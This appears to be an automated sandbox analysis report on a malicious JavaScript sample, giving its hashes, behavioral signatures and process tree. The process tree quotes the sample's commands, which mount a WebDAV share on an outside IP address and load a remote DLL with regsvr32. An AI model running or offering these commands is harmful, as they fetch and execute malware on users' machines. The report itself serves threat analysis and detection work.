Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 04:17
Static task
static1
Behavioral task
behavioral1
Sample
29980298661952420504.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
29980298661952420504.js
Resource
win10v2004-20240704-en
General
-
Target
29980298661952420504.js
-
Size
5KB
-
MD5
ebabe2a2f43f3f24055a49ca602bc5fe
-
SHA1
dacbdce1b2d3c037a6b28c841cbe565a0edd87e0
-
SHA256
1493244d5d2e3f6e1dd70af0900f7dcad52e26e2b4e5ec55f8f882788b8da1dc
-
SHA512
c3e85af6fb6014023028849379324099e04d4ee03ee967c3e2bc11a400baa7670254d08de08838cf3653a6f9a3ef0aa3332c73fb671293600e9346d3976ed65c
-
SSDEEP
96:OX0IBi5g4gbMNXKOR7ORlMdvvU8L/ViQh1HujtFHuVEL1kfLI:ANfMNak7klMdj4Y1HujtFHuVEL1kfLI
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1060 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2804 2660 wscript.exe 30 PID 2660 wrote to memory of 2804 2660 wscript.exe 30 PID 2660 wrote to memory of 2804 2660 wscript.exe 30 PID 2804 wrote to memory of 912 2804 cmd.exe 32 PID 2804 wrote to memory of 912 2804 cmd.exe 32 PID 2804 wrote to memory of 912 2804 cmd.exe 32 PID 2804 wrote to memory of 1060 2804 cmd.exe 33 PID 2804 wrote to memory of 1060 2804 cmd.exe 33 PID 2804 wrote to memory of 1060 2804 cmd.exe 33 PID 2804 wrote to memory of 1060 2804 cmd.exe 33 PID 2804 wrote to memory of 1060 2804 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\29980298661952420504.js1⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\29980298661952420504.js" "C:\Users\Admin\\eefzgv.bat" && "C:\Users\Admin\\eefzgv.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:912
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\820.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1060
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5ebabe2a2f43f3f24055a49ca602bc5fe
SHA1dacbdce1b2d3c037a6b28c841cbe565a0edd87e0
SHA2561493244d5d2e3f6e1dd70af0900f7dcad52e26e2b4e5ec55f8f882788b8da1dc
SHA512c3e85af6fb6014023028849379324099e04d4ee03ee967c3e2bc11a400baa7670254d08de08838cf3653a6f9a3ef0aa3332c73fb671293600e9346d3976ed65c